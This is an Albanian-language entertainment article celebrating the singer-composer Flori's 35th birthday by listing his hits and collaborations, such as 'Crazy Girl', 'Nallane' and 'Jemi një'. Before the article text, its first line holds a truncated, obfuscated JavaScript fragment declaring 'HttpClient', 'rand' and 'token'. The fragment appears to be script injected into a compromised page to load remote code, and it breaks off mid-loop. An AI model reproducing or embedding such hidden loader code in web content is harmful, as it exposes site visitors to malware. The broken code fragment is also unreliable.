;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Flori feston 35 vjetorin e lindjes, ndër këto vjet këto janë hitet që krijoi!

By

Karriera e tij në këto vjet, përmblidhet me një epitet: E BUJSHME.

Krijoi emër, trend në muzikë, krijoi hite për veten e më shumë për të tjerët, duke i bërë shpesh kompozimet e tija të jenë në majë të top listave të muzikës shqiptare.

Rrugëtimi i tij i gjatë në muzikë ka nisur në vitin 2002 me pjesëmarrje në Këngën Magjike aso kohe, e ai ishte po ashtu edhe pjesëtar i një grupi që mbante emrin “The Dreams”, por më pas, ai u largua për t’i lënë vendin Ermal Mamaqit të vazhdonte me grupin.

Festival pas festivali, ai arriti të bëhej emër i madh jo vetëm me zërin e tij, por edhe me notat që i nxirrte për të tjerë këngëtarë, që në muzikë bënë emër falë këngëve të tija të bukura.

Njëra ndër këngët që përherë do mbahen mend nga ai, është ajo me reperi Getoar Selimi, e realizuar vjet më parë. Një kombinim fantastik i Florit me Getin për të sjellë një kryevepër në muzikën moderne shqiptare.

Nuk do ta keni harruar dot “BABY”

Më pas, një bashkëpunim shumë i suksesshëm dhe simpatik, ishte ai me të dashurën e tij të atëhershme, këngëtaren Soni Malaj. S’ka asnjë të dashuruar që s’e ka dëgjuar atë këngë të bukur.

“Fluturimi 3470”

Një tjetër super hit i Florit, pa asnjë dyshim do të mbetet Crazy Girl, në bashkëpunim me reperin kosovar 2Po2.

“Crazy Girl”

Me po të njëjtin reper, kënga “Gjithë Jetën”, është njëra ndër këngët më të bukura të dashurisë të kënduara në shqip, sa i përket zhanrit rep.

“Gjithë Jetën”

Balada që bëri zemrat të çajnë, për gabimet në dashuri, për ndarjet, për pendimet që i takojnë së kaluarës, ishte ajo me Argjentina Ramosajn. Nën tingujt e kitarës, me zërat e ëmbël të dy artistëve, ky krijim i Florit, do mbetet gjatë në kujtesën e atyre që e dëgjuan e e pëlqyen aq shumë.

“Ku isha unë”

Ai diti t’i këndojë vuajtjes shumë bukur, duke e bërë atë edhe më të ndjerë për njerëzit që dëgjojnë muzikën e tij. Pavarësisht se i ndezë koncertet me hitet elektrizuese, “Lutem unë sot” me Klajdi Harunin, është kënga që të bën të qash edhe nëse asgjë s’të lidh me ato fjalë që këndon Flori.

“Lutem unë sot”

“Boom” do bënte me Nallane. Një tekst interesant, muzikë që të bën të lëvizësh në notat e para, Flori e pushtoi verën kur publikoi këtë këngë.

“Nallane”

Pas Nallane 1, ai e vazhdoi serinë e këngëve, duke publikuar edhe 2-shin e 3-shin. Këtë të fundit në bashkëpunim me këngëtaren Arilena Ara.

Me Elvana Gjatën, ka krijuar një super super-hit, që ka ndezur zemrat e gjithë shqiptarëve e po vazhdon të bëjë bum sa herë lëshohet, e sidomos në datat e rëndësishme kombëtare. “Jemi një” ta bën zemrën mal.

“Jemi një”

Kur Ledri e Flori bëhen bashkë, aty bëhet nami. Me këngën “Beautiful” në verën e kaluar, ata e ndezën cdo koncert, e s’kishte makinë që nuk të kalonte pranë e nuk e kishte këtë këngë duke u dëgjuar.

“Beautiful”

Dhe për fund, njëra ndër këngët e tija që përshkruante aktualitetin dhe fliste për degradimin në muzikë, është “Play Back”. Aso kohe, ishte hit anë e mbanë.

“Play Back”

Artikuj të ngjashëm